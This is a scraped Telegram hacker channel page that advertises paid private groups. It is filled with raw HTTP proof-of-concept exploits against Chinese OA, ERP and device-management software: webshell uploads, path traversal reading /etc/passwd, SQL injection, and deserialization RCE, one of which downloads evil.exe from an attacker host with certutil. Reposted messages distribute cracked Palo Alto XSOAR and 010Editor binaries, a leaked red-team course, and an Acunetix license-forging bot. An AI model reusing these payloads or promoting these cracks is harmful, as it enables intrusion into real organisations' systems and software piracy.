黑客自由城 优质内容共享
Open in Telegram
telegram最大的黑客交流社区 @Hacker_CityN (核心技术) @Hacker_CityM (核心发布) @DARKWEBEN (担保主群) @DARKWEB_EN2 (渗透推文) @hackerspike (资源交流) @spike_hacker (资源分享) @kaliLinux666 (收款存根) @Hacker_CityL (业务对接) 私有频道联系管理员付费加入
Show moreThe country is not specifiedTechnologies & Applications33 626
2 390
Subscribers
-124 hours
-17 days
+330 days
Posts Archive
2 390
金和jc6 OfficeServer任意文件上传漏洞POC
POST /jc6/OfficeServer HTTP/1.1
Host: ip:port
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Vccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.7
Eccept-Encoding: gzip, deflate
Sccept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=63766573e5ae9ee9aa8ce5aea4e79a84706f63
Connection: close
Content-Length: 182
Hello World 87 0 533 DBSTEP=REJTVEVQ
OPTION=U0FWRUZJTEU= FILENAME=Li4vLi4vcHVibGljL2VkaXQvaW5mby5qc3A= <%out.println("only test");%>
2 390
致远OA 任意文件写入
POST /seeyon/ajax.do HTTP/1.1
Host: 192.168.24.144:8089
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=77F3CDD0BF63F73259CD2BEC7B442801; hostname=192.168.24.144:8089; loginPageURL=; login_locale=zh_CN
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 183
method=ajaxAction&managerName=fileToExcelManager&managerMethod=saveExcelInBase&arg uments=["C:\Seeyon\A8\ApacheJetspeed\webapps\seeyon\ROOT/ceshi.txt","",{"columnName":[ 'HelloWorld']}]
反序列化
Poc:
POST /seeyon/ajax.do?method=ajaxAction&managerName=syncConfigManager HTTP/1.1 Host: 192.168.24.144:8089
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=e8bf99e698af63766573e5ae9ee9aa8ce5aea4e79a84706f63; hostname=192.168.24.144:8089; loginPageURL=; login_locale=zh_CN
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 174
managerMethod=checkIsCreate&arguments=["","org.h2.Driver","jdbc:h2:mem:testdb;TRACE_LE VEL_SYSTEM_OUT=3;INIT=RUNSCRIPT%20FROM%20'http://.dnslog.cn'","a","","",""]
2 390
畅捷通 T+ dll 路由反序列化 RCE 漏洞 POC
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWare houseByStore HTTP/1.1
Host: target:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate
Connection: close
Cookie: ASP.NET_SessionId=cnqudxetplwr0nb1h5tuh1uo; Hm_lvt_fd4ca40261bc424e2d120b806d985a14=1687532937; Hm_lpvt_fd4ca40261bc424e2d120b806d985a14=1687533098
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 659
{ "storeID":{
"__type":"System.Windows.Data.ObjectDataProvider, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
"MethodName":"Start", "ObjectInstance":{
"__type":"System.Diagnostics.Process, System, PublicKeyToken=b77a5c561934e089",
"StartInfo": { "__type":"System.Diagnostics.ProcessStartInfo,
PresentationFramework,
Culture=neutral, PublicKeyToken=b77a5c561934e089", "FileName":"cmd", "Arguments":"/c certutil
http://attacker:port/evil.exe C:\\users\\public\\music\\dgs.exe" }
}
}
}
2 390
科荣 AIO 管理系统 UtilServlet 文件读取漏洞 POC
POST /UtilServlet HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Pragma: no-cache
Upgrade-Insecure-Requests: 1
Content-Length: 63
operation=readErrorExcel&fileName=../../website/WEB-INF/web.xml
2 390
LiveBos ShowImage.do 文件 imgName 参数读取漏洞 POC
GET /feed/ShowImage.do;.js.jsp?type=&imgName=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip
2 390
深信服上网优化管理系统 catjs.php 文件读取漏洞 POC
POST /php/catjs.php HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Content-Length: 19
["./php/catjs.php"]
2 390
大华车载系统任意文件上传漏洞 POC
POST /vehicleServer/carDev/icon/import/1?iconType=1 HTTP/1.1 Host: ip:port
Accept: */*
Accept-Encoding: gzip, deflate, br
Content-Length: 872
Content-Type: multipart/form-data; boundary=----63766573e5ae9ee9aa8ce5aea4
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) QtWebEngine/5.9.1 Chrome/56.0.2924.122 Safari/537.36
------63766573e5ae9ee9aa8ce5aea4
Content-Disposition: form-data; name="file"; filename="test.jsp" Content-Type: image/png
GIF89a
<%jsp 马%> ------63766573e5ae9ee9aa8ce5aea4--
获取路径:
GET /vehicleServer/carDev/icon/getIconList?nowTime=164605907220
2 390
Repost from Pwn3rzs
Just updated the crack (https://ponies.cloud/av_endpoint_ids/PaloAlto_Cortex-XSOAR-6.11-Pwn3rzs-CyberArsenal.7z), since automation and other tool weren't working.
Please re-download it and then just apply the server binary again or re-do setup to be sure it works.
2 390
Repost from Pwn3rzs
Cortex XSOAR 6.11 Enterprise
Forum:
https://cyberarsenal.org/resources/cortex-xsoar.203/
Download: https://ponies.cloud/av_endpoint_ids/PaloAlto_Cortex-XSOAR-6.11-Pwn3rzs-CyberArsenal.7z
WHAT WON'T WORK:
- MARKETPLACE (need valid license)
- THREAT INTEL FROM PALO ALTO (need valid license)
- ANYTHING RELATED TO ONLINE SERVICES FROM PALO ALTO (need valid license)
- WILL BOTHER OF USER COUNT, BUT IT'S JUST SOMETHING AT DISPLAY LEVEL
REMEMBER TO FOLLOW THE README
Enjoy!
NOTE: Please let us know if something else doesn't work or will require valid license, since we couldn't test it fully
NOTE 2: Binaries are not packed due their size and performances.2 390
Repost from Pwn3rzs
So, it has been a while since CRTO 1 has been leaked, and the 2nd version is probably around as well.
Now it's time to update you all.
One of us took it and made some really nice notes and copy-pasted it by re-formatting everything with markdown.
We've seen many realeases with "markdown" styles, but it's all from the same source, us :)
So, the guy has been banned and removed, but the damage is done.
So we are sharing the original notes directly here, since they were written with Obsidian (great tool!)
Yeah, usually we don't share courses or guides, but maybe this one will help somebody who wants to learn Red Teaming, after gaining enough knowledge on the rest (pentests, and such)
Download:
https://openload.cc/T0Ldib6dzd/CRTO_1_2_Pwn3rzs_CyberArsenal_7z (or from TG)
Password: Pwn3rzs
NOTE: Updated courses images.2 390
Repost from Pwn3rzs
010Editor 14.0 solid hex editor and file analyzer - ALL PLATFORMS (win64, win32, lin64, lin32, mac)
install and replace binary with our version
2 390
Repost from Pwn3rzs
We recently extended uCare's bot (@uGenerbot) with more tools :)
Now you can generate your own Acunetix license!
Just open the bot and type:
/acunetix ent 999 999 Pwn3rsCorp Pwn3rzs Pwn3rzs@ru.les +12125550123
And it will return you a valid json to use in our Acunetix cracks!
We will add more soon, maybe :p
NOTE: PLEASE DO NOT USE THE BOT INSIDE THE CHAT, IT HAS BEEN REMOVED DUE SPAM REASONS, USE IT IN PRIVATE CHAT!
Also remember to replace the license_info.json file's content.2 390
Repost from 踹哈公寓
宏景OA文件上传
POST /w_selfservice/oauthservlet/%2e./.%2e/system/options/customreport/OfficeServer.jsp HTTP/1.1
Host: xx.xx.xx.xx
Cookie: JSESSIONID=C92F3ED039AAF958516349D0ADEE426E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 417
DBSTEP V3.0 351 0 666 DBSTEP=REJTVEVQ
OPTION=U0FWRUZJTEU=
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
FILETYPE=Li5cMW5kZXguanNw
RECOR1DID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
1
shell:http://xx.xx.xx.xx/1ndex.jsp
2 390
Repost from TG信息安全共享频道
PigCMS action_flashUpload 任意文件上传漏洞
POC:
POST /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload
HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----aaa
------aaa
Content-Disposition: form-data; name="filePath"; filename="test.php"
Content-Type: video/x-flv
<?php phpinfo();?>
------aaa
/cms/upload/images/2023/08/11/1691722887xXbx.php
2 390
Repost from TG信息安全共享频道
泛微 HrmCareerApplyPerView S Q L 注入漏洞
GET
/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(db_name()),db_name(1),5,6,7 HTTP/1.1
Host: 127.0.0.1:7443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)
Accept-Encoding: gzip, deflate
Connection: close
2 390
Repost from TG信息安全共享频道
华天动力 oa8000 布尔盲注漏洞
POST /report/reportServlet?action=8 HTTP/1.1
Host: ip:port
Content-Length: 118
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ip:port
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://ip:port/report/reportServlet?action=8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=e5b1b1e6b5b7e4b98be585b3
Connection: close
year=&userName=&startDate=&endDate=&dutyRule=*&resultPage=%2FreportJsp%2FshowReport.jsp%3Fraq%3D%252FJourTemp2.raq
